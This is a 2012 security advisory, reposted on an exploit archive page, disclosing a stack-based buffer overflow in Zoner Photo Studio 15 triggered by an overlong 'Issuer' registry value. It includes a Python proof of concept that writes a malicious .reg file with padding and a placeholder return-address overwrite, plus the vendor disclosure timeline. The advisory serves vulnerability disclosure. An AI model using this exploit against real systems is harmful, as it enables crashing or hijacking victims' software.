Zoner Photo Studio 15 Buffer Overflow



EKU-ID: 2779 CVE: OSVDB-ID:
Author: Julien Ahrens Published: 2012-11-09 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


Inshell Security Advisory
http://www.inshell.net


1. ADVISORY INFORMATION
-----------------------
Product:        Zoner Photo Studio
Vendor URL:     www.zoner.com
Type:           Stack-based Buffer Overflow [CWE-121]
Date found:     2012-10-17
Date published: 2012-11-09
CVSSv2 Score:   4,4 (AV:L/AC:M/Au:N/C:P/I:P/A:P)
CVE:            -


2. CREDITS
----------
This vulnerability was discovered and researched by Julien Ahrens from
Inshell Security.


3. VERSIONS AFFECTED
--------------------
Zoner Photo Studio 15 Build 3
Zoner Photo Studio 15 Build 2, older versions may be affected too.


4. VULNERABILITY DESCRIPTION
----------------------------
A stack-based buffer overflow vulnerability has been identified in Zoner
Photo Studio 15 Build 2 and 3.

When launching, the application loads the "Issuer" value from the
registry key "[HKEY_CURRENT_USER\Software\ZONER\Zoner Photo Studio
15\Preferences\Certificate]", but it does not validate the length of the
string loaded from the key before passing it to a buffer, which leads to
a stack-based buffer overflow.

An attacker needs to force the victim to import an arbitrary .reg file
to exploit this vulnerability.


5. PROOF-OF-CONCEPT (CODE / Exploit)
------------------------------------
#!/usr/bin/python

file="poc.reg"

junk1="\x41" * 2140
boom="\x42\x42\x42\x42"
junk2="\x43" * 1000

poc="Windows Registry Editor Version 5.00\n\n"
poc=poc + "[HKEY_CURRENT_USER\Software\ZONER\Zoner Photo Studio
15\Preferences\Certificate]\n"
poc=poc + "\"Issuer\"=\"" + junk1 + boom + junk2 + "\""

try:
    print "[*] Creating exploit file...\n";
    writeFile = open (file, "w")
    writeFile.write( poc )
    writeFile.close()
    print "[*] File successfully created!";
except:
    print "[!] Error while creating file!";


For technical details, screenshots and/or PoCs visit:
http://security.inshell.net/advisory/42


6. SOLUTION
-----------
None


7. REPORT TIMELINE
------------------
2012-10-17: Initial notification sent to vendor about bug in Build 2
2012-10-18: Vendor Feedback / Response
2012-10-22: Short vendor statement about expected delay
2012-10-29: Notification about the disclosure date
2012-**-**: Vendor releases Build 3 which is still vulnerable
2012-11-09: No response
2012-11-09: Full Disclosure according to disclosure policy


8. REFERENCES
-------------
http://security.inshell.net